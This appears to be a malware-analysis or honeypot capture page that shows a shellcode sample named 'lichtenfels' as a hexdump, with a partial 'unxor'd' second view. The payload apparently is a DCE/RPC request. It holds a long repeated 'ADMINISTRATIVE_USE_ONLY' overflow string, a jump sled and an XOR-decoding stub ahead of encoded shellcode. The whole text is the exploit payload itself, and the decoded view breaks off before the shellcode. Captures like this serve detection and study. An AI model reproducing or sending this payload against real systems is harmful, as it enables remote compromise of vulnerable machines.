lichtenfels Shellcode

Shellcode

raw

hexdump

00000000: 05 00 00 03 10 00 00 00 - 88 0b 00 00 e5 00 00 00   ........ ........
00000010: 70 0b 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00   p....... ........
00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae   ....2.X. .EdI.p..
00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00   t....... ........
00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00   p....... ........
00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20   ........ .M...j..
00000060: af 6e 72 f4 0c 00 00 00 - 52 4f 4f 54 01 00 00 00   .nr..... ROOT....
00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00   ........ ........
00000080: 00 0b 00 00 00 0b 00 00 - 52 4f 4f 54 04 00 00 00   ........ ROOT....
00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   ........ .......F
000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   8....... .......F
000000b0: 00 00 00 00 d0 0a 00 00 - c8 0a 00 00 00 00 00 00   ........ ........
000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 52 4f 4f 54   ........ ....ROOT
000000d0: c8 0a 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00   ........ ........
000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00   ........ d.......
00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00   ........ ........
00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00   ...F.... ....X...
00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 18 08 00 00   ........ ........
00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc   0....... ........
000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00   P...O... ........
000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc   ........ ........
00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00   H.....f. ........
00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00   .......F ........
00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00   ........ ....x...
00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93   X....... ....p...
00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00   .O.....W ....2.1.
00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba   ........ ........
00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00   .C...... ........
00000280: 52 4f 4f 54 04 00 00 00 - c0 01 00 00 00 00 00 00   ROOT.... ........
00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00   .......F ........
000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00   .......F ....0...
000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a   ........ ...J....
000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00   Poz..... ........
000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00   ........ ........
000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00   ........ 0...x.n.
000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00   ........ ........
00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00   ........ ........
00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00   ........ F.X.....
00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00   ........ ....0...
00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff   ........ h.......
00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00   h....... ........
00000360: f6 03 00 00 00 00 00 00 - f6 03 00 00 5c 00 5c 00   ........ ........
00000370: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000380: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000390: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000003a0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000003b0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000003c0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000003d0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000003e0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000003f0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000400: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000410: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000420: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000430: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000440: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000450: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000460: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000470: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000480: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000490: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000004a0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000004b0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000004c0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000004d0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000004e0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000004f0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000500: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000510: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000520: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000530: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000540: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000550: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000560: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000570: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000580: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000590: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000005a0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000005b0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000005c0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000005d0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000005e0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000005f0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000600: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000610: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000620: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000630: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000640: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000650: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000660: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000670: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000680: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000690: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000006a0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000006b0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000006c0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000006d0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000006e0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000006f0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000700: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000710: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000720: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000730: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000740: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000750: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000760: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000770: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000780: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000790: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000007a0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000007b0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000007c0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000007d0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000007e0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000007f0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000800: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000810: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000820: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000830: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000840: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000850: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000860: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000870: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000880: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000890: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000008a0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000008b0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000008c0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000008d0: eb 7e eb 7c 7e 15 00 01 - eb 76 eb 74 7e 15 00 01   ........ .v.t....
000008e0: eb 6e eb 6c 7e 15 00 01 - eb 66 eb 64 7e 15 00 01   .n.l.... .f.d....
000008f0: eb 5e eb 5c 7e 15 00 01 - eb 56 eb 54 7e 15 00 01   ........ .V.T....
00000900: eb 4e eb 4c 7e 15 00 01 - eb 46 eb 44 7e 15 00 01   .N.L.... .F.D....
00000910: eb 3e eb 3c 7e 15 00 01 - eb 36 eb 34 7e 15 00 01   ........ .6.4....
00000920: eb 2e eb 2c 7e 15 00 01 - eb 26 eb 24 7e 15 00 01   ........ ........
00000930: eb 1e eb 1c 7e 15 00 01 - eb 16 eb 14 7e 15 00 01   ........ ........
00000940: eb 0e eb 0c 7e 15 00 01 - eb 06 eb 04 7e 15 00 01   ........ ........
00000950: eb 02 eb 05 e8 f9 ff ff - ff 58 83 c0 1b 8d a0 01   ........ .X......
00000960: fc ff ff 83 e4 fc 8b ec - 33 c9 66 b9 a2 01 80 30   ........ 3.f....0
00000970: 93 40 e2 fa 7b e4 93 93 - 93 d4 f6 e7 c3 e1 fc f0   ........ ........
00000980: d2 f7 f7 e1 f6 e0 e0 93 - df fc f2 f7 df fa f1 e1   ........ ........
00000990: f2 e1 ea d2 93 d0 e1 f6 - f2 e7 f6 c3 e1 fc f0 f6   ........ ........
000009a0: e0 e0 d2 93 d0 ff fc e0 - f6 db f2 fd f7 ff f6 93   ........ ........
000009b0: d6 eb fa e7 c7 fb e1 f6 - f2 f7 93 e4 e0 a1 cc a0   ........ ........
000009c0: a1 93 c4 c0 d2 c0 e7 f2 - e1 e7 e6 e3 93 c4 c0 d2   ........ ........
000009d0: c0 fc f0 f8 f6 e7 d2 93 - f0 ff fc e0 f6 e0 fc f0   ........ ........
000009e0: f8 f6 e7 93 f0 fc fd fd - f6 f0 e7 93 f0 fe f7 93   ........ ........
000009f0: c9 2b 9f 63 6e ec 18 93 - 18 e3 8f 3e 18 d3 9b 18   ...cn... ........
00000a00: 4b 18 e0 af 90 60 18 e5 - eb 90 60 18 ed b3 90 68   K....... .......h
00000a10: 18 dd 87 a0 7e c5 c4 c2 - 18 ac 90 68 18 61 f9 9d   ........ ...h.a..
00000a20: ca 60 35 e7 9b ca cc 10 - 54 97 d6 71 7a ca cc cd   ..5..... T..qz...
00000a30: 18 5e 18 d5 b7 90 50 42 - 72 90 52 a0 5a f5 18 9b   ......PB r.R.Z...
00000a40: 18 d5 8f 90 50 52 72 91 - 90 52 18 93 90 50 18 69   ....PRr. .R...P.i
00000a50: 18 64 10 55 9d 18 43 f9 - 97 ca 18 64 18 7f 7b 08   .d.U..C. ...d....
00000a60: 93 93 93 10 55 98 c1 c5 - 6c c4 63 c9 18 4b a0 5a   ....U... l.c..K.Z
00000a70: 22 97 7b 14 93 93 93 10 - 55 9b c6 fb 92 92 93 93   ........ U.......
00000a80: 6c c4 63 16 53 e6 e0 c3 - c3 c3 c3 d3 c3 d3 c3 6c   l.c.S... .......l
00000a90: c4 67 10 6b 6c e7 f0 18 - 4b f5 54 d6 93 91 93 f5   .g.kl... K.T.....
00000aa0: 54 d6 91 94 ec 54 d6 97 - 4a 09 fd 75 f9 83 c6 c0   T....T.. J..u....
00000ab0: 6c c4 6f 16 53 e6 d0 a0 - 5a 22 82 c4 18 6e 60 38   l.o.S... Z....n.8
00000ac0: cc 54 d6 93 d7 93 93 93 - 1a ce af 1a ce ab 1a ce   .T...... ........
00000ad0: d3 54 d6 bf 92 92 93 93 - 1e d6 d7 c3 c6 c2 c2 c2   .T...... ........
00000ae0: d2 c2 da c2 c2 c5 c2 6c - c4 77 6c e6 d7 6c c4 7b   .......l .wl..l..
00000af0: 6c e6 db 6c c4 7b c0 6c - c4 6b c3 6c c4 7f 19 95   l..l...l .k.l....
00000b00: d5 17 53 e6 6a c2 c1 c5 - c0 6c 41 c9 ca 1a 94 d4   ..S.j... .lA.....
00000b10: d4 d4 d4 71 7a 50 90 90 - 90 90 90 00 5c 00 43 00   ...qzP.. ......C.
00000b20: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00   ....1.2. 3.4.5.6.
00000b30: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00   1.1.1.1. 1.1.1.1.
00000b40: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00   1.1.1.1. 1.1.1...
00000b50: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc   d.o.c... ........
00000b60: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00   ....0... ........
00000b70: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00   ........ ........
00000b80: 07 00 00 00 00 00 00 00 - 00                        ........ .

unxor'd

00000000: 05 00 00 03 10 00 00 00 - 88 0b 00 00 e5 00 00 00   ........ ........
00000010: 70 0b 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00   p....... ........
00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae   ....2.X. .EdI.p..
00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00   t....... ........
00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00   p....... ........
00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20   ........ .M...j..
00000060: af 6e 72 f4 0c 00 00 00 - 52 4f 4f 54 01 00 00 00   .nr..... ROOT....
00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00   ........ ........
00000080: 00 0b 00 00 00 0b 00 00 - 52 4f 4f 54 04 00 00 00   ........ ROOT....
00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   ........ .......F
000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   8....... .......F
000000b0: 00 00 00 00 d0 0a 00 00 - c8 0a 00 00 00 00 00 00   ........ ........
000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 52 4f 4f 54   ........ ....ROOT
000000d0: c8 0a 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00   ........ ........
000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00   ........ d.......
00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00   ........ ........
00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00   ...F.... ....X...
00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 18 08 00 00   ........ ........
00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc   0....... ........
000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00   P...O... ........
000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc   ........ ........
00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00   H.....f. ........
00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00   .......F ........
00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00   ........ ....x...
00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93   X....... ....p...
00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00   .O.....W ....2.1.
00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba   ........ ........
00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00   .C...... ........
00000280: 52 4f 4f 54 04 00 00 00 - c0 01 00 00 00 00 00 00   ROOT.... ........
00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00   .......F ........
000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00   .......F ....0...
000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a   ........ ...J....
000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00   Poz..... ........
000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00   ........ ........
000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00   ........ 0...x.n.
000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00   ........ ........
00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00   ........ ........
00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00   ........ F.X.....
00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00   ........ ....0...
00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff   ........ h.......
00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00   h....... ........
00000360: f6 03 00 00 00 00 00 00 - f6 03 00 00 5c 00 5c 00   ........ ........
00000370: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000380: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000390: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000003a0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000003b0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000003c0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000003d0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000003e0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000003f0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000400: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000410: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000420: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000430: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000440: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000450: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000460: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000470: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000480: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000490: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000004a0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000004b0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000004c0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000004d0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000004e0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000004f0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000500: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000510: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000520: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000530: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000540: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000550: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000560: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000570: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000580: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000590: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000005a0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000005b0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000005c0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000005d0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000005e0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
